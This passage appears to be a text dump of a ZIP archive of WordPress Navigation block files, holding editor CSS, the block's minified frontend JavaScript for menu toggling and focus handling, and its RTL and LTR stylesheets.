.wp-block-navigation__responsive-container.is-menu-open{top:141px}}.is-mobile-preview .wp-block-navigation__responsive-container.is-menu-open,.is-tablet-preview .wp-block-navigation__responsive-container.is-menu-open{top:141px}.is-sidebar-opened .wp-block-navigation__responsive-container.is-menu-open{left:280px}.is-fullscreen-mode .wp-block-navigation__responsive-container.is-menu-open{right:0;top:155px}@media (min-width:782px){.is-fullscreen-mode .wp-block-navigation__responsive-container.is-menu-open{top:61px}.is-fullscreen-mode .has-fixed-toolbar .wp-block-navigation__responsive-container.is-menu-open{top:109px}}.is-fullscreen-mode .is-mobile-preview .wp-block-navigation__responsive-container.is-menu-open,.is-fullscreen-mode .is-tablet-preview .wp-block-navigation__responsive-container.is-menu-open{top:109px}body.editor-styles-wrapper .wp-block-navigation__responsive-container.is-menu-open{bottom:0;left:0;right:0;top:0}.components-button.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close,.components-button.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{color:inherit;height:auto;padding:0}.components-heading.wp-block-navigation-off-canvas-editor__title{margin:0}.wp-block-navigation-off-canvas-editor__header{margin-bottom:8px}.is-menu-open .wp-block-navigation__responsive-container-content * .block-list-appender{margin-top:16px}@keyframes fadein{0%{opacity:0}to{opacity:1}}.wp-block-navigation__loading-indicator-container{padding:8px 12px}.wp-block-navigation .wp-block-navigation__uncontrolled-inner-blocks-loading-indicator{margin-top:0}@keyframes fadeouthalf{0%{opacity:1}to{opacity:.5}}.wp-block-navigation-delete-menu-button{justify-content:center;margin-bottom:16px;width:100%}.components-button.is-link.wp-block-navigation-manage-menus-button{margin-bottom:16px}.wp-block-navigation__overlay-menu-preview{align-items:center;background-color:#f0f0f0;display:flex;height:64px;justify-content:space-between;margin-bottom:12px;padding:0 24px;width:100%}.wp-block-navigation__overlay-menu-preview.open{background-color:#fff;box-shadow:inset 0 0 0 1px #e0e0e0;outline:1px solid transparent}.wp-block-navigation-placeholder__actions hr+hr,.wp-block-navigation__toolbar-menu-selector.components-toolbar-group:empty{display:none}.wp-block-navigation__navigation-selector{margin-bottom:16px;width:100%}.wp-block-navigation__navigation-selector-button{border:1px solid;justify-content:space-between;width:100%}.wp-block-navigation__navigation-selector-button__icon{flex:0 0 auto}.wp-block-navigation__navigation-selector-button__label{flex:0 1 auto;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.wp-block-navigation__navigation-selector-button--createnew{border:1px solid;margin-bottom:16px;width:100%}.wp-block-navigation__responsive-container-open.components-button{opacity:1}.wp-block-navigation__menu-inspector-controls{overflow-x:auto;scrollbar-color:transparent transparent;scrollbar-gutter:stable both-edges;scrollbar-width:thin;will-change:transform}.wp-block-navigation__menu-inspector-controls::-webkit-scrollbar{height:12px;width:12px}.wp-block-navigation__menu-inspector-controls::-webkit-scrollbar-track{background-color:transparent}.wp-block-navigation__menu-inspector-controls::-webkit-scrollbar-thumb{background-clip:padding-box;background-color:transparent;border:3px solid transparent;border-radius:8px}.wp-block-navigation__menu-inspector-controls:focus-within::-webkit-scrollbar-thumb,.wp-block-navigation__menu-inspector-controls:focus::-webkit-scrollbar-thumb,.wp-block-navigation__menu-inspector-controls:hover::-webkit-scrollbar-thumb{background-color:#949494}.wp-block-navigation__menu-inspector-controls:focus,.wp-block-navigation__menu-inspector-controls:focus-within,.wp-block-navigation__menu-inspector-controls:hover{scrollbar-color:#949494 transparent}@media (hover:none){.wp-block-navigation__menu-inspector-controls{scrollbar-color:#949494 transparent}}.wp-block-navigation__menu-inspector-controls__empty-message{margin-right:24px}PK7[2Ė7navigation/view.min.jsnu["use strict";(self.__WordPressPrivateInteractivityAPI__=self.__WordPressPrivateInteractivityAPI__||[]).push([[3],{932:function(e,n,o){var t=o(754);const a=["a[href]",'input:not([disabled]):not([type="hidden"]):not([aria-hidden])',"select:not([disabled]):not([aria-hidden])","textarea:not([disabled]):not([aria-hidden])","button:not([disabled]):not([aria-hidden])","[contenteditable]",'[tabindex]:not([tabindex^="-"])'];document.addEventListener("click",(()=>{}));const i=(e,n)=>{const{context:o,selectors:t}=e;t.core.navigation.menuOpenedBy(e)[n]=!0,"overlay"===o.core.navigation.type&&document.documentElement.classList.add("has-modal-open")},c=(e,n)=>{const{context:o,selectors:t}=e;t.core.navigation.menuOpenedBy(e)[n]=!1,t.core.navigation.isMenuOpen(e)||(o.core.navigation.modal?.contains(window.document.activeElement)&&o.core.navigation.previousFocus?.focus(),o.core.navigation.modal=null,o.core.navigation.previousFocus=null,"overlay"===o.core.navigation.type&&document.documentElement.classList.remove("has-modal-open"))};(0,t.h)({effects:{core:{navigation:{initMenu:e=>{const{context:n,selectors:o,ref:t}=e;if(o.core.navigation.isMenuOpen(e)){const e=t.querySelectorAll(a);n.core.navigation.modal=t,n.core.navigation.firstFocusableElement=e[0],n.core.navigation.lastFocusableElement=e[e.length-1]}},focusFirstElement:e=>{const{selectors:n,ref:o}=e;n.core.navigation.isMenuOpen(e)&&o.querySelector(".wp-block-navigation-item > *:first-child").focus()}}}},selectors:{core:{navigation:{roleAttribute:e=>{const{context:n,selectors:o}=e;return"overlay"===n.core.navigation.type&&o.core.navigation.isMenuOpen(e)?"dialog":null},ariaModal:e=>{const{context:n,selectors:o}=e;return"overlay"===n.core.navigation.type&&o.core.navigation.isMenuOpen(e)?"true":null},ariaLabel:e=>{const{context:n,selectors:o}=e;return"overlay"===n.core.navigation.type&&o.core.navigation.isMenuOpen(e)?n.core.navigation.ariaLabel:null},isMenuOpen:({context:e})=>Object.values(e.core.navigation["overlay"===e.core.navigation.type?"overlayOpenedBy":"submenuOpenedBy"]).filter(Boolean).length>0,menuOpenedBy:({context:e})=>e.core.navigation["overlay"===e.core.navigation.type?"overlayOpenedBy":"submenuOpenedBy"]}}},actions:{core:{navigation:{openMenuOnHover(e){const{navigation:n}=e.context.core;"submenu"===n.type&&0===Object.values(n.overlayOpenedBy||{}).filter(Boolean).length&&i(e,"hover")},closeMenuOnHover(e){c(e,"hover")},openMenuOnClick(e){const{context:n,ref:o}=e;n.core.navigation.previousFocus=o,i(e,"click")},closeMenuOnClick(e){c(e,"click"),c(e,"focus")},openMenuOnFocus(e){i(e,"focus")},toggleMenuOnClick:e=>{const{selectors:n,context:o,ref:t}=e;window.document.activeElement!==t&&t.focus();const a=n.core.navigation.menuOpenedBy(e);a.click||a.focus?(c(e,"click"),c(e,"focus")):(o.core.navigation.previousFocus=t,i(e,"click"))},handleMenuKeydown:e=>{const{context:n,selectors:o,event:t}=e;if(o.core.navigation.menuOpenedBy(e).click){if("Escape"===t?.key)return c(e,"click"),void c(e,"focus");"overlay"===n.core.navigation.type&&"Tab"===t.key&&(t.shiftKey&&window.document.activeElement===n.core.navigation.firstFocusableElement?(t.preventDefault(),n.core.navigation.lastFocusableElement.focus()):t.shiftKey||window.document.activeElement!==n.core.navigation.lastFocusableElement||(t.preventDefault(),n.core.navigation.firstFocusableElement.focus()))}},handleMenuFocusout:e=>{const{context:n,event:o}=e;(null===o.relatedTarget||!n.core.navigation.modal?.contains(o.relatedTarget)&&o.target!==window.document.activeElement)&&(c(e,"click"),c(e,"focus"))}}}}})}},function(e){var n;n=932,e(e.s=n)}]);PK7[9{>E>Enavigation/style-rtl.cssnu[.wp-block-navigation{ --navigation-layout-justification-setting:flex-start; --navigation-layout-direction:row; --navigation-layout-wrap:wrap; --navigation-layout-justify:flex-start; --navigation-layout-align:center; position:relative; } .wp-block-navigation ul{ margin-bottom:0; margin-right:0; margin-top:0; padding-right:0; } .wp-block-navigation ul,.wp-block-navigation ul li{ list-style:none; padding:0; } .wp-block-navigation .wp-block-navigation-item{ align-items:center; background-color:inherit; display:flex; position:relative; } .wp-block-navigation .wp-block-navigation-item .wp-block-navigation__submenu-container:empty{ display:none; } .wp-block-navigation .wp-block-navigation-item__content{ display:block; } .wp-block-navigation .wp-block-navigation-item__content.wp-block-navigation-item__content{ color:inherit; } .wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:focus{ text-decoration:underline; } .wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:focus{ text-decoration:line-through; } .wp-block-navigation:where(:not([class*=has-text-decoration])) a{ text-decoration:none; } .wp-block-navigation:where(:not([class*=has-text-decoration])) a:active,.wp-block-navigation:where(:not([class*=has-text-decoration])) a:focus{ text-decoration:none; } .wp-block-navigation .wp-block-navigation__submenu-icon{ align-self:center; background-color:inherit; border:none; color:currentColor; display:inline-block; font-size:inherit; height:.6em; line-height:0; margin-right:.25em; padding:0; width:.6em; } .wp-block-navigation .wp-block-navigation__submenu-icon svg{ stroke:currentColor; display:inline-block; height:inherit; margin-top:.075em; width:inherit; } .wp-block-navigation.is-vertical{ --navigation-layout-direction:column; --navigation-layout-justify:initial; --navigation-layout-align:flex-start; } .wp-block-navigation.no-wrap{ --navigation-layout-wrap:nowrap; } .wp-block-navigation.items-justified-center{ --navigation-layout-justification-setting:center; --navigation-layout-justify:center; } .wp-block-navigation.items-justified-center.is-vertical{ --navigation-layout-align:center; } .wp-block-navigation.items-justified-right{ --navigation-layout-justification-setting:flex-end; --navigation-layout-justify:flex-end; } .wp-block-navigation.items-justified-right.is-vertical{ --navigation-layout-align:flex-end; } .wp-block-navigation.items-justified-space-between{ --navigation-layout-justification-setting:space-between; --navigation-layout-justify:space-between; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container{ align-items:normal; background-color:inherit; color:inherit; display:flex; flex-direction:column; height:0; opacity:0; overflow:hidden; position:absolute; right:-1px; top:100%; transition:opacity .1s linear; visibility:hidden; width:0; z-index:2; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content{ display:flex; flex-grow:1; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content .wp-block-navigation__submenu-icon{ margin-left:0; margin-right:auto; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation-item__content{ margin:0; } @media (min-width:782px){ .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{ right:100%; top:-1px; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{ background:transparent; content:""; display:block; height:100%; left:100%; position:absolute; width:.5em; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon{ margin-left:.25em; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon svg{ transform:rotate(90deg); } } .wp-block-navigation .has-child:not(.open-on-click):hover>.wp-block-navigation__submenu-container{ height:auto; min-width:200px; opacity:1; overflow:visible; visibility:visible; width:auto; } .wp-block-navigation .has-child:not(.open-on-click):not(.open-on-hover-click):focus-within>.wp-block-navigation__submenu-container{ height:auto; min-width:200px; opacity:1; overflow:visible; visibility:visible; width:auto; } .wp-block-navigation .has-child .wp-block-navigation-submenu__toggle[aria-expanded=true]~.wp-block-navigation__submenu-container{ height:auto; min-width:200px; opacity:1; overflow:visible; visibility:visible; width:auto; } .wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container{ right:0; top:100%; } @media (min-width:782px){ .wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{ right:100%; top:0; } } .wp-block-navigation-submenu{ display:flex; position:relative; } .wp-block-navigation-submenu .wp-block-navigation__submenu-icon svg{ stroke:currentColor; } button.wp-block-navigation-item__content{ background-color:transparent; border:none; color:currentColor; font-family:inherit; font-size:inherit; font-style:inherit; font-weight:inherit; line-height:inherit; text-align:right; text-transform:inherit; } .wp-block-navigation-submenu__toggle{ cursor:pointer; } .wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle{ padding-left:.85em; } .wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle+.wp-block-navigation__submenu-icon{ margin-right:-.6em; pointer-events:none; } .wp-block-navigation .wp-block-page-list,.wp-block-navigation__container,.wp-block-navigation__responsive-close,.wp-block-navigation__responsive-container,.wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-dialog{ gap:inherit; } :where(.wp-block-navigation.has-background .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation.has-background .wp-block-navigation-submenu a:not(.wp-element-button)){ padding:.5em 1em; } :where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu button.wp-block-navigation-item__content),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-pages-list__item button.wp-block-navigation-item__content){ padding:.5em 1em; } .wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container{ left:0; right:auto; } .wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{ left:-1px; right:-1px; } @media (min-width:782px){ .wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{ left:100%; right:auto; } } .wp-block-navigation:not(.has-background) .wp-block-navigation__submenu-container{ background-color:#fff; border:1px solid rgba(0,0,0,.15); } .wp-block-navigation.has-background .wp-block-navigation__submenu-container{ background-color:inherit; } .wp-block-navigation:not(.has-text-color) .wp-block-navigation__submenu-container{ color:#000; } .wp-block-navigation__container{ align-items:var(--navigation-layout-align, initial); display:flex; flex-direction:var(--navigation-layout-direction, initial); flex-wrap:var(--navigation-layout-wrap, wrap); justify-content:var(--navigation-layout-justify, initial); list-style:none; margin:0; padding-right:0; } .wp-block-navigation__container .is-responsive{ display:none; } .wp-block-navigation__container:only-child,.wp-block-page-list:only-child{ flex-grow:1; } @keyframes overlay-menu__fade-in-animation{ 0%{ opacity:0; transform:translateY(.5em); } to{ opacity:1; transform:translateY(0); } } .wp-block-navigation__responsive-container{ bottom:0; display:none; left:0; position:fixed; right:0; top:0; } .wp-block-navigation__responsive-container :where(.wp-block-navigation-item a){ color:inherit; } .wp-block-navigation__responsive-container .wp-block-navigation__responsive-container-content{ align-items:var(--navigation-layout-align, initial); display:flex; flex-direction:var(--navigation-layout-direction, initial); flex-wrap:var(--navigation-layout-wrap, wrap); justify-content:var(--navigation-layout-justify, initial); } .wp-block-navigation__responsive-container:not(.is-menu-open.is-menu-open){ background-color:inherit !important; color:inherit !important; } .wp-block-navigation__responsive-container.is-menu-open{ animation:overlay-menu__fade-in-animation .1s ease-out; animation-fill-mode:forwards; background-color:inherit; display:flex; flex-direction:column; overflow:auto; padding:clamp(1rem, var(--wp--style--root--padding-top), 20rem) clamp(1rem, var(--wp--style--root--padding-left), 20em) clamp(1rem, var(--wp--style--root--padding-bottom), 20rem) clamp(1rem, var(--wp--style--root--padding-right), 20rem); z-index:100000; } @media (prefers-reduced-motion:reduce){ .wp-block-navigation__responsive-container.is-menu-open{ animation-delay:0s; animation-duration:1ms; } } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content{ align-items:var(--navigation-layout-justification-setting, inherit); display:flex; flex-direction:column; flex-wrap:nowrap; overflow:visible; padding-top:calc(2rem + 24px); } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{ justify-content:flex-start; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-icon{ display:none; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .has-child .wp-block-navigation__submenu-container{ border:none; height:auto; min-width:200px; opacity:1; overflow:initial; padding-left:2rem; padding-right:2rem; position:static; visibility:visible; width:auto; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{ gap:inherit; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{ padding-top:var(--wp--style--block-gap, 2em); } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item__content{ padding:0; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{ align-items:var(--navigation-layout-justification-setting, initial); display:flex; flex-direction:column; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item .wp-block-navigation__submenu-container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-page-list{ background:transparent !important; color:inherit !important; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{ left:auto; right:auto; } @media (min-width:600px){ .wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open){ background-color:inherit; display:block; position:relative; width:100%; z-index:auto; } .wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open) .wp-block-navigation__responsive-container-close{ display:none; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{ right:0; } } .wp-block-navigation:not(.has-background) .wp-block-navigation__responsive-container.is-menu-open{ background-color:#fff; } .wp-block-navigation:not(.has-text-color) .wp-block-navigation__responsive-container.is-menu-open{ color:#000; } .wp-block-navigation__toggle_button_label{ font-size:1rem; font-weight:700; } .wp-block-navigation__responsive-container-close,.wp-block-navigation__responsive-container-open{ background:transparent; border:none; color:currentColor; cursor:pointer; margin:0; padding:0; text-transform:inherit; vertical-align:middle; } .wp-block-navigation__responsive-container-close svg,.wp-block-navigation__responsive-container-open svg{ fill:currentColor; display:block; height:24px; pointer-events:none; width:24px; } .wp-block-navigation__responsive-container-open{ display:flex; } .wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{ font-family:inherit; font-size:inherit; font-weight:inherit; } @media (min-width:600px){ .wp-block-navigation__responsive-container-open:not(.always-shown){ display:none; } } .wp-block-navigation__responsive-container-close{ left:0; position:absolute; top:0; z-index:2; } .wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close{ font-family:inherit; font-size:inherit; font-weight:inherit; } .wp-block-navigation__responsive-close{ width:100%; } .has-modal-open .wp-block-navigation__responsive-close{ margin-left:auto; margin-right:auto; max-width:var(--wp--style--global--wide-size, 100%); } .wp-block-navigation__responsive-close:focus{ outline:none; } .is-menu-open .wp-block-navigation__responsive-close,.is-menu-open .wp-block-navigation__responsive-container-content,.is-menu-open .wp-block-navigation__responsive-dialog{ box-sizing:border-box; } .wp-block-navigation__responsive-dialog{ position:relative; } .has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{ margin-top:46px; } @media (min-width:782px){ .has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{ margin-top:32px; } } html.has-modal-open{ overflow:hidden; }PK7[Ey 8E8Enavigation/style.cssnu[.wp-block-navigation{ --navigation-layout-justification-setting:flex-start; --navigation-layout-direction:row; --navigation-layout-wrap:wrap; --navigation-layout-justify:flex-start; --navigation-layout-align:center; position:relative; } .wp-block-navigation ul{ margin-bottom:0; margin-left:0; margin-top:0; padding-left:0; } .wp-block-navigation ul,.wp-block-navigation ul li{ list-style:none; padding:0; } .wp-block-navigation .wp-block-navigation-item{ align-items:center; background-color:inherit; display:flex; position:relative; } .wp-block-navigation .wp-block-navigation-item .wp-block-navigation__submenu-container:empty{ display:none; } .wp-block-navigation .wp-block-navigation-item__content{ display:block; } .wp-block-navigation .wp-block-navigation-item__content.wp-block-navigation-item__content{ color:inherit; } .wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:focus{ text-decoration:underline; } .wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:focus{ text-decoration:line-through; } .wp-block-navigation:where(:not([class*=has-text-decoration])) a{ text-decoration:none; } .wp-block-navigation:where(:not([class*=has-text-decoration])) a:active,.wp-block-navigation:where(:not([class*=has-text-decoration])) a:focus{ text-decoration:none; } .wp-block-navigation .wp-block-navigation__submenu-icon{ align-self:center; background-color:inherit; border:none; color:currentColor; display:inline-block; font-size:inherit; height:.6em; line-height:0; margin-left:.25em; padding:0; width:.6em; } .wp-block-navigation .wp-block-navigation__submenu-icon svg{ stroke:currentColor; display:inline-block; height:inherit; margin-top:.075em; width:inherit; } .wp-block-navigation.is-vertical{ --navigation-layout-direction:column; --navigation-layout-justify:initial; --navigation-layout-align:flex-start; } .wp-block-navigation.no-wrap{ --navigation-layout-wrap:nowrap; } .wp-block-navigation.items-justified-center{ --navigation-layout-justification-setting:center; --navigation-layout-justify:center; } .wp-block-navigation.items-justified-center.is-vertical{ --navigation-layout-align:center; } .wp-block-navigation.items-justified-right{ --navigation-layout-justification-setting:flex-end; --navigation-layout-justify:flex-end; } .wp-block-navigation.items-justified-right.is-vertical{ --navigation-layout-align:flex-end; } .wp-block-navigation.items-justified-space-between{ --navigation-layout-justification-setting:space-between; --navigation-layout-justify:space-between; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container{ align-items:normal; background-color:inherit; color:inherit; display:flex; flex-direction:column; height:0; left:-1px; opacity:0; overflow:hidden; position:absolute; top:100%; transition:opacity .1s linear; visibility:hidden; width:0; z-index:2; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content{ display:flex; flex-grow:1; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content .wp-block-navigation__submenu-icon{ margin-left:auto; margin-right:0; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation-item__content{ margin:0; } @media (min-width:782px){ .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{ left:100%; top:-1px; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{ background:transparent; content:""; display:block; height:100%; position:absolute; right:100%; width:.5em; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon{ margin-right:.25em; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon svg{ transform:rotate(-90deg); } } .wp-block-navigation .has-child:not(.open-on-click):hover>.wp-block-navigation__submenu-container{ height:auto; min-width:200px; opacity:1; overflow:visible; visibility:visible; width:auto; } .wp-block-navigation .has-child:not(.open-on-click):not(.open-on-hover-click):focus-within>.wp-block-navigation__submenu-container{ height:auto; min-width:200px; opacity:1; overflow:visible; visibility:visible; width:auto; } .wp-block-navigation .has-child .wp-block-navigation-submenu__toggle[aria-expanded=true]~.wp-block-navigation__submenu-container{ height:auto; min-width:200px; opacity:1; overflow:visible; visibility:visible; width:auto; } .wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container{ left:0; top:100%; } @media (min-width:782px){ .wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{ left:100%; top:0; } } .wp-block-navigation-submenu{ display:flex; position:relative; } .wp-block-navigation-submenu .wp-block-navigation__submenu-icon svg{ stroke:currentColor; } button.wp-block-navigation-item__content{ background-color:transparent; border:none; color:currentColor; font-family:inherit; font-size:inherit; font-style:inherit; font-weight:inherit; line-height:inherit; text-align:left; text-transform:inherit; } .wp-block-navigation-submenu__toggle{ cursor:pointer; } .wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle{ padding-right:.85em; } .wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle+.wp-block-navigation__submenu-icon{ margin-left:-.6em; pointer-events:none; } .wp-block-navigation .wp-block-page-list,.wp-block-navigation__container,.wp-block-navigation__responsive-close,.wp-block-navigation__responsive-container,.wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-dialog{ gap:inherit; } :where(.wp-block-navigation.has-background .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation.has-background .wp-block-navigation-submenu a:not(.wp-element-button)){ padding:.5em 1em; } :where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu button.wp-block-navigation-item__content),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-pages-list__item button.wp-block-navigation-item__content){ padding:.5em 1em; } .wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container{ left:auto; right:0; } .wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{ left:-1px; right:-1px; } @media (min-width:782px){ .wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{ left:auto; right:100%; } } .wp-block-navigation:not(.has-background) .wp-block-navigation__submenu-container{ background-color:#fff; border:1px solid rgba(0,0,0,.15); } .wp-block-navigation.has-background .wp-block-navigation__submenu-container{ background-color:inherit; } .wp-block-navigation:not(.has-text-color) .wp-block-navigation__submenu-container{ color:#000; } .wp-block-navigation__container{ align-items:var(--navigation-layout-align, initial); display:flex; flex-direction:var(--navigation-layout-direction, initial); flex-wrap:var(--navigation-layout-wrap, wrap); justify-content:var(--navigation-layout-justify, initial); list-style:none; margin:0; padding-left:0; } .wp-block-navigation__container .is-responsive{ display:none; } .wp-block-navigation__container:only-child,.wp-block-page-list:only-child{ flex-grow:1; } @keyframes overlay-menu__fade-in-animation{ 0%{ opacity:0; transform:translateY(.5em); } to{ opacity:1; transform:translateY(0); } } .wp-block-navigation__responsive-container{ bottom:0; display:none; left:0; position:fixed; right:0; top:0; } .wp-block-navigation__responsive-container :where(.wp-block-navigation-item a){ color:inherit; } .wp-block-navigation__responsive-container .wp-block-navigation__responsive-container-content{ align-items:var(--navigation-layout-align, initial); display:flex; flex-direction:var(--navigation-layout-direction, initial); flex-wrap:var(--navigation-layout-wrap, wrap); justify-content:var(--navigation-layout-justify, initial); } .wp-block-navigation__responsive-container:not(.is-menu-open.is-menu-open){ background-color:inherit !important; color:inherit !important; } .wp-block-navigation__responsive-container.is-menu-open{ animation:overlay-menu__fade-in-animation .1s ease-out; 